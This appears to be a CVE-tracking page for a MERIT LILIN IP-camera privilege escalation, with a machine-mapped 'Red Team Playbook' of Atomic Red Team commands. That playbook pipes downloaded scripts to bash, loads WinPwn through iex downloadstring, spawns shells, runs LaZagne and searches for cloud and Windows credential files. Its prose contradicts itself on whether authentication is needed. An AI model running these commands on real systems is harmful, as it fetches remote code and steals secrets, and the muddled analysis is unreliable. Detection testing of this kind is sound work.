CVE-2021-30167
Overview
This vulnerability is an authentication bypass and improper access control issue in the user profile management service of MERIT LILIN IP camera firmware. The root cause lies in insufficient validation of URL parameters, allowing unauthorized modification of user data. The affected component is the network camera's user management interface, which fails to enforce proper privilege checks on user profile update requests.
Vulnerability Description
The manage users profile services of the network camera device allows an authenticated. Remote attackers can modify URL parameters and further amend user’s information and escalate privileges to control the devices.
Impact
An attacker can remotely escalate privileges on the affected IP camera without prior authentication, gaining administrative control over the device. This enables full device management, including configuration changes and potential lateral movement within the network. The vulnerability requires only network access and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H. Exploitation can lead to complete compromise of the camera's confidentiality, integrity, and availability, impacting surveillance security and network trust.
Solution
MERIT LILIN has released firmware updates addressing this issue, as detailed in advisory M00166-TW available at https://www.meritlilin.com/assets/uploads/support/file/M00166-TW.pdf. Users should upgrade affected firmware versions (e.g., p2r8852e2_firmware series) to the patched releases provided by the vendor. The advisory includes step-by-step instructions for applying the update and recommends disabling remote management interfaces until the patch is applied to mitigate exploitation risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the user profile management services of certain network camera devices allows authenticated remote attackers to manipulate URL parameters. This manipulation can lead to unauthorized modifications of user information, enabling privilege escalation. The flaw arises from inadequate validation of input parameters, which allows attackers to alter critical data without proper authentication checks. This lack of robust security controls can lead to severe consequences, as attackers may gain elevated privileges and take control of the devices, potentially compromising the integrity and confidentiality of the video feeds and other sensitive data managed by these cameras.
Attack vectors for exploiting this vulnerability are primarily focused on authenticated sessions. An attacker, having gained access to a legitimate user account, can craft malicious requests to modify user details or escalate their privileges. For instance, an attacker could change user roles or permissions, allowing them to assume administrative control over the device. This could be executed through various means, such as phishing attacks to obtain user credentials or exploiting weak password policies. Once the attacker has access, the manipulation of URL parameters becomes a straightforward task, leading to full control over the camera's functionalities.
The real-world impact of this vulnerability is significant, particularly for businesses relying on these network cameras for security and surveillance. Unauthorized access could lead to the exposure of sensitive footage, which may contain confidential information or critical operational details. This breach not only jeopardizes the physical security of the premises but also poses legal and reputational risks for organizations. Companies could face regulatory scrutiny and potential fines if they fail to protect personal data adequately. Moreover, the loss of trust from customers and stakeholders can have long-lasting effects on business operations and profitability.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments and penetration testing can help identify potential weaknesses in the system. Employing robust authentication mechanisms, such as two-factor authentication, can significantly reduce the risk of unauthorized access. Additionally, input validation and sanitization should be enforced to prevent manipulation of URL parameters. Organizations should also ensure that firmware updates are applied promptly to address known vulnerabilities, as manufacturers often release patches to rectify security flaws. Monitoring logs for unusual access patterns can further aid in detecting potential exploitation attempts.
In conclusion, the vulnerability in the user profile management services of specific network camera devices presents a critical security risk that can lead to unauthorized access and control. The potential for exploitation through manipulated URL parameters underscores the need for stringent security measures and proactive risk management strategies. By prioritizing security best practices, organizations can safeguard their assets and maintain the integrity of their surveillance systems against evolving threats.
Affected Products (41)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Meritlilin | P2r8852e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r8852e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r8852e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r8852e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6852e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6852e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6852e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6852e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6552e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6552e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6552e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6552e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6352ae2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6352ae2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6352ae4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6352ae4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r3052ae2 Firmware | All |
cpe:2.3:o:meritlilin:p2r3052ae2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2g1052 Firmware | All |
cpe:2.3:o:meritlilin:p2g1052_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r8822e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r8822e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r8822e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r8822e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6822e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6822e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6822e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6822e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6522e2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6522e2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6522e4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6522e4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6322ae2 Firmware | All |
cpe:2.3:o:meritlilin:p2r6322ae2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r6322ae4 Firmware | All |
cpe:2.3:o:meritlilin:p2r6322ae4_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2r3022ae2 Firmware | All |
cpe:2.3:o:meritlilin:p2r3022ae2_firmware:*:*:*:*:*:*:*:*
|
|
|
Meritlilin | P2g1022 Firmware | All |
cpe:2.3:o:meritlilin:p2g1022_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-30167 |
| twcert.org.tw |
GitHub CVE
x_refsource_MISC
|
https://www.twcert.org.tw/tw/cp-132-4676-391a5-1.html |
| meritlilin.com |
GitHub CVE
x_refsource_MISC
|
https://www.meritlilin.com/assets/uploads/support/file/M00166-TW.pdf |
| gist.github.com |
GitHub CVE
x_refsource_MISC
|
https://gist.github.com/keniver/86ebef688fb274b534da51ef1a84dd3e |
| chtsecurity.com |
GitHub CVE
x_refsource_MISC
|
https://www.chtsecurity.com/news/0b733a38-e616-4ff3-86a6-13e710643388 |